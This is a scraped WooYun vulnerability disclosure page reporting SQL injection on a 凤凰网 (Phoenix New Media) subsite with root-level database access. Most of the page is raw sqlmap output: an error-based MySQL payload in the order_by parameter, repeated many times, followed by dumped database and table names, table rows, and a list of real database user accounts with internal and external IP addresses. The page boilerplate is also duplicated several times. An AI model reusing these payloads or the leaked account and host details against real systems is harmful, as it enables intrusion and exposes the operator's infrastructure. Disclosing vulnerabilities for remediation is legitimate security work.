    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
current user is DBA:    'True'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: apphistory_news
[5 tables]
+-------------+
| figure      |
| hot_tag     |
| relate_news |
| relate_pic  |
| stats       |
+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: app_weather
[5 tables]
+-------------+
| abroad      |
| airport     |
| internal    |
| nephogram   |
| relate_news |
+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: app_news
[23 tables]
+-----------------------------+
| hash                        |
| hdphoto                     |
| ip_test                     |
| lianghui_2010               |
| lianghui_2010_copy_20100226 |
| lianghui_2010_lhyl          |
| lianghui_2012               |
| lianghui_2012_lhyl          |
| special_diqiuyixiaoshi2010  |
| special_martyr              |
| special_qinghaiyushudizhen  |
| special_xinanhanzai         |
| timeline                    |
| tw_vote                     |
| upload                      |
| upload_20121116             |
| upload_v                    |
| user_test                   |
| vote_category               |
| vote_detail                 |
| weather_yb                  |
| weather_yb_tomorrow         |
| weather_zh                  |
+-----------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: app_news
Table: user_test
[2 entries]
+----+--------------+------+---------+-------------+---------------------+
| id | ip           | lock | intro   | username    | rec_time            |
+----+--------------+------+---------+-------------+---------------------+
| 1  | 220.181.24.2 |      | <blank> | wangyun1127 | 2010-05-10 14:27:06 |
| 2  | 220.181.24.2 |      | c100    | c100        | 0000-00-00 00:00:00 |
+----+--------------+------+---------+-------------+---------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: app_news
Table: hash
[10 entries]
+----+--------------+--------+
| id | name         | value  |
+----+--------------+--------+
| 1  | ygdx_gd      | 258    |
| 2  | ygdx_bsd     | 306    |
| 3  | ygdx_zmd     | 57     |
| 4  | ygdx_time    | 5月8日   |
| 5  | wudu2010_hlb | 198864 |
| 6  | wudu2010_szc | 150782 |
| 7  | wudu2010_wyc | 0      |
| 8  | wudu2010_xsh | 0      |
| 9  | wudu2010_wwm | 0      |
| 10 | wudu2010_zll | 358715 |
+----+--------------+--------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
Database: app_news
Table: lianghui_2012
[10 entries]
+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+
| id | type | title | verify | delete | cai_num | content | ding_num | user_name    | user_type | click_num | debate_num | submit_time         |
+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+
| 1  | 1    | 1     | 1      |        | 2       | 1       | 3        | kuaibo_10501 | 1         | 7         | 0          | 2012-02-28 17:44:30 |
| 2  | 1    | 11    | 1      |        | 0       | 1       | 1        | kuaibo_10501 | 1         | 0         | 0          | 2012-02-29 15:46:47 |
| 3  | 1    | 2     | 1      |        | 0       | 2       | 1        | kuaibo_10501 | 1         | 0         | 0          | 2012-02-29 15:46:54 |
| 4  | 1    | 3     | 1      |        | 0       | 3       | 0        | kuaibo_10501 | 1         | 0         | 0          | 2012-02-29 15:46:59 |
| 5  | 1    | 4     | 1      |        | 0       | 4       | 0        | kuaibo_10501 | 1         | 0         | 0          | 2012-02-29 15:47:05 |
| 6  | 1    | 5     | 1      |        | 1       | 5       | 0        | kuaibo_10501 | 1         | 0         | 0          | 2012-02-29 15:47:09 |
| 7  | 1    | 5     | 1      |        | 1       | 5       | 20       | kuaibo_10501 | 1         | 97        | 0          | 2012-02-29 15:47:17 |
| 8  | 1    | 6     | 1      |        | 0       | 6       | 5        | kuaibo_10501 | 1         | 107       | 0          | 2012-02-29 15:47:22 |
| 9  | 1    | 7     | 1      |        | 0       | 7       | 91       | kuaibo_10501 | 1         | 235       | 0          | 2012-02-29 15:47:26 |
| 10 | 1    | 8     | 1      |        | 2       | 8       | 2        | kuaibo_10501 | 1         | 97        | 0          | 2012-02-29 15:47:31 |
+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
current user is DBA:    'True'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined
---
database management system users [234]:
[*] ''@'localhost'
[*] 'B74wNuTbbx'@'10.11.2.89'
[*] 'B74wNuTbbx'@'10.11.2.90'
[*] 'B74wNuTbbx'@'10.13.2.134'
[*] 'B74wNuTbbx'@'10.13.2.135'
[*] 'B74wNuTbbx'@'10.13.2.176'
[*] 'B74wNuTbbx'@'10.13.2.177'
[*] 'B74wNuTbbx'@'220.181.67.192'
[*] 'iadmin'@'211.151.61.77'
[*] 'root'@'10.13.2.132'
[*] 'root'@'10.13.2.134'
[*] 'root'@'10.13.2.135'
[*] 'root'@'10.13.2.176'
[*] 'root'@'10.13.2.177'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.2.162'
[*] 'root'@'192.168.2.167'
[*] 'root'@'220.181.24.100'
[*] 'root'@'220.181.24.166'
[*] 'root'@'220.181.24.2'
[*] 'root'@'220.181.67.192'
[*] 'root'@'localhost'
[*] 'zabbix'@'127.0.0.1'
漏洞证明：

修复方案：

防注入
版权声明：转载请注明来源 Hxai11@乌云

漏洞回应

厂商回应：

危害等级：高
漏洞Rank：12
确认时间：2014-05-05 13:59
厂商回复：

非常感谢您对凤凰网信息安全的关注,我们会尽快修复这个漏洞.
WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059433

漏洞标题：凤凰网分站SQL注入漏洞（root权限）

相关厂商：凤凰网

漏洞作者： Hxai11

提交时间：2014-05-05 12:49

修复时间：2014-06-19 12:50

公开时间：2014-06-19 12:50

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Hxai11@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059433

漏洞标题：凤凰网分站SQL注入漏洞（root权限）

相关厂商：凤凰网

漏洞作者： Hxai11

提交时间：2014-05-05 12:49

修复时间：2014-06-19 12:50

公开时间：2014-06-19 12:50

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-059433"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Hxai11@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：
